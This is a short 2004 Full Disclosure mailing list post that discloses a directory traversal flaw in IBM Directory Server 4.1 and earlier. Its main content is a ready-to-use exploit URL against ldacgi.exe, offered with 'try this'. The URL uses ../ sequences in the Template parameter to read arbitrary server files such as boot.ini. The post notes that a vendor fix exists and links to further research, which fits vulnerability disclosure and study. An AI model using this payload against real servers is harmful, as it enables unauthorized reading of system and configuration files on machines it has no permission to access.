
Full Disclosure mailing list archives
IBM Directory Server - ldacgi.exe
From: <oliver () greyhat de>
Date: Mon, 2 Aug 2004 10:44:02 +0200
hi there, try this to read any file on IBM Directory Server <= 4.1 http://myserver/ldap/cgi-bin/ldacgi.exe?Action=Substitute&Template=../../../../../boot.ini&Sub=LocalePath&LocalePath=enus1252 PS: This vuln is already known to IBM and a fix is available. But since i did not found any information about existence and exploitation of this vuln on the web, i wrote this little mail. For further information look here: http://www.oliverkarow.de/research/IDS_directory_traversal.txt /Oliver _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- IBM Directory Server - ldacgi.exe oliver (Aug 02)